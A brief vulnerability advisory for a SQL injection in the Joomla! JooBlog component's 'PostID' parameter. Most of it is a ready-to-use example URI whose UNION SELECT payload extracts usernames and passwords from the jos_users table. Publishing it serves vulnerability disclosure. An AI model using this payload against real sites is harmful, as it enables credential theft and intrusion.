Joomla! JooBlog Component 'PostID' Parameter SQL Injection Vulnerability

Joomla! JooBlog Component 'PostID' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/Path/index.php?option=com_jb2&PostID=-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*